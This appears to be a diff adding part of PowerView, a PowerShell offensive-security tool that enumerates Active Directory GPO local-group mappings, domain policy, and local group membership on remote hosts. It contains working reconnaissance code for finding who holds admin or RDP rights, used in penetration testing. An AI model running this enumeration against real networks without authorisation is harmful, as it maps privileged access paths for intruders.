+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ 
$CommonArguments = @{}
+ if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
+ }
+
+ PROCESS {
+ $TargetSIDs = @()
+
+ if ($PSBoundParameters['Identity']) {
+ $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid
+ $TargetObjectSID = $TargetSIDs
+ if (-not $TargetSIDs) {
+ Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'"
+ }
+ }
+ else {
+ # no filtering/match all
+ $TargetSIDs = @('*')
+ }
+
+ if ($LocalGroup -match 'S-1-5') {
+ $TargetLocalSID = $LocalGroup
+ }
+ elseif ($LocalGroup -match 'Admin') {
+ $TargetLocalSID = 'S-1-5-32-544'
+ }
+ else {
+ # RDP
+ $TargetLocalSID = 'S-1-5-32-555'
+ }
+
+ if ($TargetSIDs[0] -ne '*') {
+ ForEach ($TargetSid in $TargetSids) {
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'"
+ $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid
+ }
+ }
+
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID"
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs"
+
+ $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object {
+ $GPOgroup = $_
+ # if the locally set group is what we're looking for, check the GroupMembers 
('members') for our target SID
+ if ($GPOgroup.GroupSID -match $TargetLocalSID) {
+ $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
+ if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
+ $GPOgroup
+ }
+ }
+ }
+ # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs
+ if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
+ if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
+ $GPOgroup
+ }
+ }
+ } | Sort-Object -Property GPOName -Unique
+
+ $GPOgroups | Where-Object {$_} | ForEach-Object {
+ $GPOname = $_.GPODisplayName
+ $GPOguid = $_.GPOName
+ $GPOPath = $_.GPOPath
+ $GPOType = $_.GPOType
+ if ($_.GroupMembers) {
+ $GPOMembers = $_.GroupMembers
+ }
+ else {
+ $GPOMembers = $_.GroupSID
+ }
+
+ $Filters = $_.Filters
+
+ if ($TargetSIDs[0] -eq '*') {
+ # if the * wildcard was used, set the targets to all GPO members so everything it output
+ $TargetObjectSIDs = $GPOMembers
+ }
+ else {
+ $TargetObjectSIDs = $TargetObjectSID
+ }
+
+ # find any OUs that have this GPO linked through gpLink
+ Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+ if ($Filters) {
+ $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname
+ }
+ else {
+ $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname
+ }
+
+ if ($OUComputers) {
+ if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
+
+ ForEach ($TargetSid in $TargetObjectSIDs) {
+ $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
+
+ $IsGroup = @('268435456','268435457','536870912','536870913') -contains 
$Object.samaccounttype
+
+ $GPOLocalGroupMapping = New-Object PSObject
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers
+ $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping')
+ $GPOLocalGroupMapping
+ }
+ }
+ }
+
+ # find any sites that have this GPO linked through gpLink
+ Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+ ForEach ($TargetSid in $TargetObjectSIDs) {
+ $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
+
+ $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+
+ $GPOLocalGroupMapping = New-Object PSObject
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+ $GPOLocalGroupMapping | Add-Member Noteproperty 
'GPODisplayName' $GPOname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
+ $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping')
+ $GPOLocalGroupMapping
+ }
+ }
+ }
+ }
+}
+
+
+function Get-DomainGPOComputerLocalGroupMapping {
+<#
+.SYNOPSIS
+
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
+
+.DESCRIPTION
+
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
+
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of. Then resolve the computer's site name with
+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite. For those results, attempt to
+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup. For
+each resulting GPO group, resolve the resulting user/group name to a full AD object and
+return the results. This will return the domain objects that are members of the specified
+-LocalGroup for the given computer.
+
+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and
+localgroup specifications.
+
+.PARAMETER ComputerIdentity
+
+A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g. windows10.testlab.local) for the computer to identity GPO local group mappings for.
+
+.PARAMETER OUIdentity
+
+An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or
+GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.
+
+.PARAMETER LocalGroup
+
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
+
+.PARAMETER Domain
+
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local
+
+Finds users who have local admin rights over WINDOWS3 through GPO correlation.
+
+.EXAMPLE
+
+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP
+
+Finds users who have RDP rights over WINDOWS4 through GPO correlation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!'
-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local
+
+.OUTPUTS
+
+PowerView.GGPOComputerLocalGroupMember
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GGPOComputerLocalGroupMember')]
+ [CmdletBinding(DefaultParameterSetName = 'ComputerIdentity')]
+ Param(
+ [Parameter(Position = 0, ParameterSetName = 'ComputerIdentity', Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('ComputerName', 'Computer', 'DistinguishedName', 'SamAccountName', 'Name')]
+ [String]
+ $ComputerIdentity,
+
+ [Parameter(Mandatory = $True, ParameterSetName = 'OUIdentity')]
+ [Alias('OU')]
+ [String]
+ $OUIdentity,
+
+ [String]
+ [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+ $LocalGroup = 'Administrators',
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $CommonArguments = @{}
+ if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+ if
($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['ComputerIdentity']) { + $Computers = Get-DomainComputer @CommonArguments -Identity $ComputerIdentity -Properties 'distinguishedname,dnshostname' + + if (-not $Computers) { + throw "[Get-DomainGPOComputerLocalGroupMapping] Computer $ComputerIdentity not found. Try a fully qualified host name." + } + + ForEach ($Computer in $Computers) { + + $GPOGuids = @() + + # extract any GPOs linked to this computer's OU through gpLink + $DN = $Computer.distinguishedname + $OUIndex = $DN.IndexOf('OU=') + if ($OUIndex -gt 0) { + $OUName = $DN.SubString($OUIndex) + } + if ($OUName) { + $GPOGuids += Get-DomainOU @CommonArguments -SearchBase $OUName -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } + } + + # extract any GPOs linked to this computer's site through gpLink + Write-Verbose "Enumerating the sitename for: $($Computer.dnshostname)" + $ComputerSite = (Get-NetComputerSiteName -ComputerName $Computer.dnshostname).SiteName + if ($ComputerSite -and ($ComputerSite -notmatch 'Error')) { + $GPOGuids += Get-DomainSite @CommonArguments -Identity $ComputerSite -LDAPFilter '(gplink=*)' | ForEach-Object { + Select-String -InputObject $_.gplink -Pattern '(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}' -AllMatches | ForEach-Object {$_.Matches | Select-Object -ExpandProperty Value } + } + } + + # process any GPO local group settings from the GPO GUID set + $GPOGuids | Get-DomainGPOLocalGroup 
@CommonArguments | Sort-Object -Property GPOName -Unique | ForEach-Object { + $GPOGroup = $_ + + if($GPOGroup.GroupMembers) { + $GPOMembers = $GPOGroup.GroupMembers + } + else { + $GPOMembers = $GPOGroup.GroupSID + } + + $GPOMembers | ForEach-Object { + $Object = Get-DomainObject @CommonArguments -Identity $_ + $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype + + $GPOComputerLocalGroupMember = New-Object PSObject + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ComputerName' $Computer.dnshostname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectName' $Object.samaccountname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'ObjectSID' $_ + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath + $GPOComputerLocalGroupMember | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType + $GPOComputerLocalGroupMember.PSObject.TypeNames.Add('PowerView.GPOComputerLocalGroupMember') + $GPOComputerLocalGroupMember + } + } + } + } + } +} + + +function Get-DomainPolicyData { +<# +.SYNOPSIS + +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID + +.DESCRIPTION + +Returns the default domain policy or the domain controller policy for the current +domain or a specified domain/domain controller using Get-DomainGPO. + +.PARAMETER Domain + +The domain to query for default policies, defaults to the current domain. 
+
+.PARAMETER Policy
+
+Extract 'Domain', 'DC' (domain controller) policies, or 'All' for all policies.
+Otherwise queries for the particular GPO name or GUID.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainPolicyData
+
+Returns the default domain policy for the current domain.
+
+.EXAMPLE
+
+Get-DomainPolicyData -Domain dev.testlab.local
+
+Returns the default domain policy for the dev.testlab.local domain.
+
+.EXAMPLE
+
+Get-DomainGPO | Get-DomainPolicy
+
+Parses any GptTmpl.infs found for any policies in the current domain.
+
+.EXAMPLE
+
+Get-DomainPolicyData -Policy DC -Domain dev.testlab.local
+
+Returns the policy for the dev.testlab.local domain controller.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicyData -Credential $Cred
+
+.OUTPUTS
+
+Hashtable
+
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
+#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Source', 'Name')] + [String] + $Policy = 'Domain', + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ConvertArguments = @{} + if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $SearcherArguments['Domain'] = $Domain + $ConvertArguments['Domain'] = $Domain + } + + if ($Policy -eq 'All') { + $SearcherArguments['Identity'] = '*' + } + elseif ($Policy -eq 'Domain') { + $SearcherArguments['Identity'] = '{31B2F340-016D-11D2-945F-00C04FB984F9}' + } + elseif (($Policy -eq 'DomainController') -or ($Policy -eq 'DC')) { + $SearcherArguments['Identity'] = '{6AC1786C-016F-11D2-945F-00C04FB984F9}' + } + else { + $SearcherArguments['Identity'] = $Policy + } + + $GPOResults = Get-DomainGPO @SearcherArguments + + ForEach ($GPO in $GPOResults) { + # grab the GptTmpl.inf file and parse it + $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + + $ParseArgs = @{ + 'GptTmplPath' = $GptTmplPath + 'OutputObject' = $True + } + if 
($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential } + + # parse the GptTmpl.inf + Get-GptTmpl @ParseArgs | ForEach-Object { + $_ | Add-Member Noteproperty 'GPOName' $GPO.name + $_ | Add-Member Noteproperty 'GPODisplayName' $GPO.displayname + $_ + } + } + } +} + + +######################################################## +# +# Functions that enumerate a single host, either through +# WinNT, WMI, remote registry, or API calls +# (with PSReflect). +# +######################################################## + +function Get-NetLocalGroup { +<# +.SYNOPSIS + +Enumerates the local groups on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +.DESCRIPTION + +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". + +.EXAMPLE + +Get-NetLocalGroup + +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... + +.EXAMPLE + +Get-NetLocalGroup -Method Winnt + +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... 
+WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... S-1-5-32-569 Members are author... +... + +.EXAMPLE + +Get-NetLocalGroup -ComputerName primary.testlab.local + +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... + +.OUTPUTS + +PowerView.LocalGroup.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroup.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +.LINK + +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroup.API')] + [OutputType('PowerView.LocalGroup.WinNT')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { + # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information + + # arguments for NetLocalGroupEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 
+ $ResumeHandle = 0 + + # get the local user information + $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $LOCALGROUP_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $LOCALGROUP_INFO_1 + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $LocalGroup = New-Object PSObject + $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer + $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name + $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment + $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API') + $LocalGroup + } + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # otherwise we're using the WinNT service provider + $ComputerProvider = [ADSI]"WinNT://$Computer,computer" + + $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { + $LocalGroup = ([ADSI]$_) + $Group = New-Object PSObject + $Group | Add-Member Noteproperty 'ComputerName' $Computer + $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name')) + $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value) + $Group | Add-Member Noteproperty 'Comment' 
($LocalGroup.InvokeGet('Description')) + $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT') + $Group + } + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetLocalGroupMember { +<# +.SYNOPSIS + +Enumerates members of a specific local group on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName + +.DESCRIPTION + +This function will enumerate the members of a specified local group on the +current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +.PARAMETER GroupName + +The local group name to query for users. If not given, it defaults to "Administrators". + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". + +.EXAMPLE + +Get-NetLocalGroupMember | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True + +.EXAMPLE + +Get-NetLocalGroupMember -Method winnt | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... 
False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True + +.EXAMPLE + +Get-NetLocalGroup | Get-NetLocalGroupMember | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... S-1-5-21-25... False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... S-1-5-21-89... True UNKNOWN + +.EXAMPLE + +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\loc... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89... True False +primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89... True False + +.OUTPUTS + +PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. 
